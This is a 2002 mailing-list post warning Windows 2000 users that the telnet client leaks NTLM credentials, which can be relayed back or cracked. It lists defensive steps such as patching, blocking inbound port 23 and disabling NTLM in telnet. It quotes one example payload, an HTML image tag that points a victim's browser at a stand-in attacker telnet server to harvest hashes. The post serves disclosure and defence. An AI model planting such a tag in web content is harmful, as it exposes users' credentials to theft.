Firewall Wizards mailing list archives
Re: Danger of telnet on w2k (Was: re: Annoying pop-ups)
From: Mikael Olsson <mikael.olsson () clavister com>
Date: Wed, 30 Oct 2002 16:42:10 +0100
Mikael Olsson wrote:
PLUS port 23 (Telnet!) Sure, it isn't on by default, but people found ways to abuse DCOM to turn it on remotely. Uh oh.
I just figured that this deserved a bit of extra mention. I'm sure that most people think "Bah. I've got a good admin password, and I don't log on via telnet anyway, so I'm safe". If so, here's something you need to know: Microsoft embedded NTLM auth in telnet in w2k. This means that, unless instructed to do otherwise, the w2k telnet client will send out NTLM authentication data of the currently logged on user whenever you telnet to an NTLM-enabled server. This same data sent out can be relayed back to your box and used to log on to you without delay. It can also be fed to l0phtcrack. Microsoft did indeed send out an advisory about this two years ago, but I figured it deserved another mention, seeing as how people still tend to forget about this. All it needs is an image tag like <img src="telnet://evilserver.int:2323"> Stuff that can help: - Read http://www.microsoft.com/technet/security/bulletin/MS00-067.asp and install patch. The patch is to display a warning before NTLM is sent to stuff outside the local zone. However, we have seen the zone schemes be subverted before, so don't rely on it. - Block port 23 inbound to avoid the direct relay back to your telnet port. Disabling the telnet service might be a good idea, but don't rely on it. - Run "telnet" without arguments. Type "unset ntlm". This prevents the telnet client from sending ntlm hashes at all. - Blocking port 23 outbound will NOT help. -- Mikael Olsson, Clavister AB Storgatan 12, Box 393, SE-891 28 ÖRNSKÖLDSVIK, Sweden Phone: +46 (0)660 29 92 00 Mobile: +46 (0)70 26 222 05 Fax: +46 (0)660 122 50 WWW: http://www.clavister.com Learn to count in Swedish! "ett, två, tre, fyra, fem, sex, sju ..." _______________________________________________ firewall-wizards mailing list firewall-wizards () honor icsalabs com http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
Current thread:
- Re: Annoying pop-ups, (continued)
- Re: Annoying pop-ups Josh Welch (Oct 29)
- Re: Annoying pop-ups Gary Flynn (Oct 29)
- Re: Annoying pop-ups Crispin Cowan (Oct 29)
- Re: Annoying pop-ups Mikael Olsson (Oct 29)
- Re: Annoying pop-ups Gregory Austin (Oct 29)
- Re: Annoying pop-ups Mikael Olsson (Oct 29)
- RE: Annoying pop-ups Ames, Neil (Oct 28)
- Re: Annoying pop-ups Mikael Olsson (Oct 28)
- Re: Annoying pop-ups Paul D. Robertson (Oct 29)
- Re: Annoying pop-ups Luca Berra (Oct 30)
- Re: Windows networking specifics (Was: re: Annoying pop-ups) Mikael Olsson (Oct 30)
- Re: Danger of telnet on w2k (Was: re: Annoying pop-ups) Mikael Olsson (Oct 30)
- Re: Annoying pop-ups Mikael Olsson (Oct 28)
- RE: Annoying pop-ups Ames, Neil (Oct 29)